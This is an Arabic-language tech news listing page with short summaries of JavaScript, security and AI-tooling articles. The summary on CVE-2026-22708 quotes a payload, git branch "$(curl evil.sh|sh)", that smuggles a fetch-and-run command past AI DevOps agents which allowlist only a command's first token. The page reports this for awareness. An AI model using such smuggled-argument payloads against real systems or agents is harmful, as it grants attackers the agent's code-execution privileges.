GyaanSetu JavaScript

The JavaScript and TypeScript ecosystem.

100 articlesDeep, practical knowledge

"Pi" و "Tardis" المدعومان بالذكاء الاصطناعي يُمكّنان Shopify من التخلي عن React Native بعد ست سنوات

قامت Shopify بتطوير وكيلين داخليين للذكاء الاصطناعي — "Pi" لرسم خرائط الميزات و"Tardis" لتصحيح الأخطاء المباشر — لأتمتة عملية إعادة كتابة الكود، مما أتاح لها الاستغناء عن تقنية React Native التي اعتمدت عليها لست سنوات، مع الحصول على تشغيل أسرع بمقدار ثانيتين، وحجم تطبيق أصغر بمقدار 109 ميجابايت، وانخفاض في حالات الانهيار بمقدار عشرة أضعاف تقريبًا.

JavaScript · 2 دقيقة قراءة

ميزة Promise.withResolvers في Node 22 تقلص حلقات أدوات Claude إلى النصف

عبر استبدال نمط `new Promise` الضخم باستدعاء واحد لـ `Promise.withResolvers()`، يمكن للمطورين تمرير وظائف resolve/reject إلى أي جزء من النظام، مما يقضي على مشكلات الـ resolve المنسية، وتحذيرات الـ double-reject، والتداخل العميق (deep nesting) — وهو أمر مفيد للغاية في بيئات Lambda عديمة الخادم (serverless).

JavaScript · 4 دقيقة قراءة

بصمة TLS تُجبر أدوات الكشط المعتمدة على Playwright على إهدار موارد الحوسبة السحابية، مما يرفع التكاليف

تقوم الخوادم بتحويل رسالة TLS ClientHello الخام إلى بصمة JA3/JA4؛ وأي عدم تطابق مع الـ User-Agent المُدعى به أو إعدادات HTTP/2 يؤدي إلى تصنيف الطلب على أنه طلب برمجي (scripted). الحل الموثوق الوحيد هو جعل كل طبقة من طبقات الطلب تعكس نفس خصائص المتصفح.

JavaScript · 4 دقيقة قراءة

نموذج Pocket-35B من VIDRAFT يعمل على أي معالج لجهاز كمبيوتر محمول ويحقق مليون عملية تحميل

تُحمل أوزان Pocket-35B بتنسيق GGUF مباشرة في llama.cpp أو Ollama، مما يتيح للفرق التي لا تملك ميزانية لوحدات معالجة الرسومات (GPU) تشغيل نموذج بـ 35 مليار معلمة على جهاز كمبيوتر محمول قياسي، بشرط استيفاء متطلبات ذاكرة الوصول العشوائي (RAM) المتواضعة.

JavaScript · 3 دقيقة قراءة

لماذا يتوقف مشغل HTML5 المخصص الخاص بك عن العمل عند البث – 4 فخاخ خفية

تقوم عملية البث (Casting) بنقل عملية التشغيل إلى البرامج الثابتة (firmware) الخاصة بالتلفاز، لذا يجب أن تظل الرموز (tokens) صالحة لما بعد انتهاء الجلسة، ويجب أن تتضمن ترويسات CORS مصدر التلفاز، كما لا يمكن أن يكون رابط البث من نوع blob. يوضح هذا الدليل كيفية الانتقال إلى رابط manifest والتحقق من صحة الاتصال.

JavaScript · 3 دقيقة قراءة

كيف يقلل ملف القفل النصي لـ Bun من مخاطر سلاسل التوريد عبر تمكين فحص السياسات في الـ CI

ملف القفل الافتراضي الجديد في Bun v1.2 هو bun.lock بنص عادي، ليحل محل الملف غير الواضح bun.lockb. يتيح هذا التغيير للمراجعين رؤية التغييرات الدقيقة في الإصدارات، وإجراء فحوصات السياسات في الـ CI، وتتبع الإدخالات الخبيثة باستخدام أدوات git القياسية.

JavaScript · 1 دقيقة قراءة

برمجية JSCeal الخبيثة تسرق رموز OAuth لمتصفح Chrome وتلغي فعالية المصادقة الثنائية من Google لمتداولي العملات الرقمية

تقوم حمولة JSCeal التي تعمل في الذاكرة فقط باستخراج ملفات تعريف الارتباط وكلمات المرور المحفوظة ورموز OAuth من متصفحات Chromium، ثم تعيد تشغيل الجلسات لتجاوز مطالبات المصادقة الثنائية من Google، مما يتيح للمهاجمين الاستيلاء على الأموال من Binance وBybit وLedger وغيرها.

JavaScript · 2 دقيقة قراءة

١٣ نسخة مزيفة من أدوات تطوير البرمجيات (SDKs) لمحفظة Coinbase تغرق سجل npm في ٤٨ ثانية

الحزم، التي نُشرت بين الساعة 04:54:59 و04:55:48 بالتوقيت العالمي المنسق (UTC) في 7 سبتمبر 2026، حاكت @coinbase/wallet-sdk بأسماء مثل cb-wallet-http واستخدمت الإصدار 0.0.1-security، مما يسلط الضوء على مدى سرعة قدرة البرمجيات الخبيثة على اختراق المشاريع.

JavaScript · 2 دقيقة قراءة

ClickFix يختطف إيداعات العملات المشفرة مباشرة من المتصفحات عبر Tampermonkey

اكتشفت Cisco Talos عملية ClickFix، وهي عملية احتيال لسرقة العملات المشفرة تخدع المستخدمين لتثبيت نص برمجي (script) عبر Tampermonkey. يقوم هذا النص بإعادة كتابة عناوين الإيداع في الوقت الفعلي، مما يؤدي إلى سحب الأموال بينما تبدو المعاملة شرعية.

JavaScript · 2 دقيقة قراءة

اثنان فقط من أصل 13 نطاقاً من نطاقات Semver يعملان بنفس الطريقة عبر npm وCargo وComposer وpip

كشف اختبار 13 تعبيراً للنطاقات مقابل 19 رقماً للإصدارات عن 17 نتيجة متطابقة فقط، معظمها كانت حالات رفض. يتم تفسير رموز Caret وtilde وdot-x بشكل مختلف من قبل كل مدير حزم، مما يؤدي إلى حالات عدم توافق مفاجئة.

JavaScript · 2 دقيقة قراءة

أداة سحب النماذج في Ollama تسمح للمهاجمين غير المصرح لهم بالحصول على البيانات الوصفية للسحابة عبر ثغرة SSRF

لا تزال ثغرة SSRF قائمة في إصدار Ollama 0.33.2 لأن برنامج تنزيل نماذج التنسور يستخدم عميل HTTP منفصلاً يتخطى آلية الحماية من إعادة التوجيه التي أُضيفت لمعالجة CVE-2026-5530، مما يتيح للمهاجمين إعادة توجيه عمليات السحب إلى أي عنوان يمكن الوصول إليه.

JavaScript · 3 دقيقة قراءة

انكشاف بوتات الـ DevOps المدعومة بالذكاء الاصطناعي: القوائم البيضاء للبادئات تسمح للمهاجمين بتشغيل أكواد برمجية عشوائية

توضح الثغرة CVE-2026-22708 أن الوكلاء الذين يتحققون فقط من الرمز الأول للأمر يمكن خداعهم عبر حمولات مخفية في الوسائط—مثل: git branch "$(curl evil.sh|sh)"—مما يمنح المهاجمين نفس صلاحيات بوت الأتمتة.

JavaScript · 4 دقيقة قراءة

WebFPGA يوفر استنتاج TinyML في 4 مللي ثانية بقدرة 30 ميلي واط – لا تخرج أي بيانات من المتصفح

يستخدم WebFPGA واجهة برمجة تطبيقات WebUSB لبرمجة FPGA من نوع Lattice iCE40-UP5K باستخدام JavaScript، مما يتيح استنتاج TinyML في أقل من 10 مللي ثانية مع استهلاك بضع عشرات فقط من الميلي واط وإبقاء جميع البيانات على الجهاز.

JavaScript · 2 دقيقة قراءة

LibreOffice 26.8 يطلق خارطة طريق تضع الخصوصية في المقدمة، متجاوزاً اتصالات الذكاء الاصطناعي السحابية

يقدم الإصدار الجديد تحسيناً في تنسيق الفقرات للنصوص المعقدة، ويضيف عرض مسودة مبسط، ويحسن عملية تحويل ملفات ODF إلى DOCX/XLSX، بينما تضمن التحديثات الأمنية وتقنية عزل الماكرو (macro sandboxing) بقاء المستندات آمنة محلياً.

JavaScript · 2 دقيقة قراءة

TypeScript 7 يقلص زمن تأخير فحص الأنواع بنسبة 40% عبر ملف ثنائي جديد بلغة Rust

يعمل المحرك المكتوب بلغة Rust في عملية منفصلة، مما يفصل تحليل الأنواع عن خيط واجهة المستخدم (UI thread)، مع إضافة تقنية تخزين مؤقت أكثر ذكاءً تعيد فحص الملفات المعدلة فقط، مما يوفر عمليات بناء تزايدية أكثر سرعة وسلاسة.

JavaScript · 2 دقيقة قراءة

وضع Vapor في Vue 3.6 يتخلى عن الـ Virtual DOM ويعزز أداء الألعاب

يقوم وضع Vapor المرتقب في Vue 3.6 بتحويل المكونات أحادية الملف إلى استدعاءات مباشرة للـ DOM، مما يلغي خطوة المقارنة (diffing) الخاصة بالـ virtual-DOM. وفي الألعاب الاختبارية التي تتطلب إعادة رسم عشرات المرات في الثانية، يقلل هذا التغيير من وقت الرندرة ويقلص حجم الحزم البرمجية، رغم أن واجهات المستخدم ذات التردد المنخفض لن تشهد تحسناً ملحوظاً.

JavaScript · 4 دقيقة قراءة

كلود ينقل أربع أدوات للوكلاء إلى مرحلة الإطلاق العام، ملغياً ترويسات النسخة التجريبية للمؤسسات

مع إزالة ترويسات الطلبات المقتصرة على النسخة التجريبية، بات بإمكان المؤسسات أخيراً تجاوز العقبات القانونية والأمنية. كما يعد وضع الإجراءات الجماعية الجديد لأداة استخدام الكمبيوتر بتقليل زمن الاستجابة واستهلاك الرموز (tokens)، وإن كانت هذه التوفيرات لا تزال بحاجة إلى التحقق.

JavaScript · 3 دقيقة قراءة

TanStack Table v9 يقلص حجم الحزمة إلى حوالي 5 كيلوبايت عبر ميزات الاختيار الاختياري

تتيح لك النسخة التجريبية الجديدة استيراد ميزات الشبكة التي تستخدمها فقط، مما يسمح لك بتجاوز كود الترتيب تماماً، وتقليص حجم التنزيل إلى حوالي 5 كيلوبايت، وتجنب العمليات على الخيط الرئيسي التي كانت تبطئ درجات INP سابقاً.

JavaScript · 2 دقيقة قراءة